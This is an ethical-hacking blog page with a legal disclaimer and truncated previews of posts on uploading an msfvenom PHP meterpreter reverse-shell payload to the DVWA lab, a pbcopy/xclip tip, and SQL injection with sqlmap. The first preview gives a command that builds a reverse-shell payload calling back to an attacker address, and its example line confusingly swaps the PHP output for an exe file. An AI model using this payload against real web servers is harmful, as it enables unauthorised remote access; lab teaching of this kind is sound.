DISCLAIMER


The goal of this blog is to teach you how to penetrate computer network, computer, (web or non-web) servers, (web or non-web) applications, and (web or non-web) users; protect against common attacks; and generally improve your understanding of what (web or non-web) security is. In a perfect world, no one would use the tools and techniques discussed in these blogs in an unethical manner. But since that’s not the case, keep the following in mind as you read along:

  • Think before you hack.
  • Don’t do malicious things.
  • Don’t attack a target unless you have written permission.
  • Many of the tools and techniques discussed in this blog are easily detected and traced.

Use of this blog is only for education purpose. I shall not responsible for any errors, omissions, or damages arising out of the use of the information contained in this blog. If you do something illegal, you could be sued or thrown into jail. One basic assumption this blog makes is that you understand right from wrong.  I endorse using this blog not to do anything illegal. If you break into someone's network, server or web application without permission, law enforcement agency kicks your door in!

Those who access or use the blog from any locations do so at their own risk and are responsible for compliance with local law.

Some of the post on this blog include links to external websites. I don’t take responsibility for the content of these external sites. I will not responsible for any misuse of the contents present in this blog.

Note: Before you step into the cyber security and ethical hacking world, it is very important that, set up your own a safe environment for learning and practice. 

For that, SETTING UP A TEST/VULNERABLE ENVIRONMENT


Popular posts from this blog

Exploiting a Web Server - Using msfvenom generated PHP Web Payload

Image
 Exploiting a Web Server - Using msfvenom generated PHP Web Payload  This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data. We will start by creating a pre-prepared PHP code that we will upload to the web server through the upload functionality provide by DVWA.  For this exercise, I hosted DVWA application in XAMPP on my host operating system. I will generate PHP code using msfvenom on Kali Linux which is hosted/run on oracle VBOX. On the Kali Linux, run the following command to generate PHP Web Payload: $ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php For example, $ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe > phpshell.exe Here, 192.168.0.2 is a IP Address of Kali Server It will generate fo...
Read more

How To Imitate (Replicate) pbcopy And pbpaste Commands On Linux

Image
How To I mitate (Replicate ) pbcopy And pbpaste Commands On Linux pbcopy  on a mac enables you to copy the standard input from terminal window to your clipboard enabling you to paste it to other applications.  This functionality is not   available  by default on  Ubuntu / Linux  but can be easily imitate using  available Linux commands You can  imitate  pbcopy and  pbpaste     on ubuntu/linux by using similar tool called  xclip which does exactly the same.  However its syntax is a little complicated  it required more options/switches. So,  I am going to  imitate  it with  pbcopy and pbpaste command. Fortunately, OS X and Linux *nix based we can make use of the The alias c ommand to replicate the pbcopy and pbpaste functionality in ubuntu/linux. If you haven’t previously installed xclip simply run the following command in your terminal:    $  sudo apt-get install xclip -y Edit y...
Read more

Automate SQL Injection Exploitation with SqlMap - DVWA

Automate SQL Injection Exploitation with SqlMap - Damn Vulnerable Web App ( DVWA) What is a SQL Injection? SQL injection is a technique often used to attack data driven applications. SQL injection is considered a high risk vulnerability due to the fact that can lead to full compromise of the web application. This is why in almost all web application penetration testing engagements, the applications are always checked for SQL injection flaws. A general and simple definition of when an application is vulnerable to SQL injection is when the application allows you to interact with the database and to execute queries on the database then it is vulnerable to SQL injection attacks. This is done by crafted parameter/statements passed as input (HTML form) in an attempt to get the website to pass a newly formed SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in an web application's code....
Read more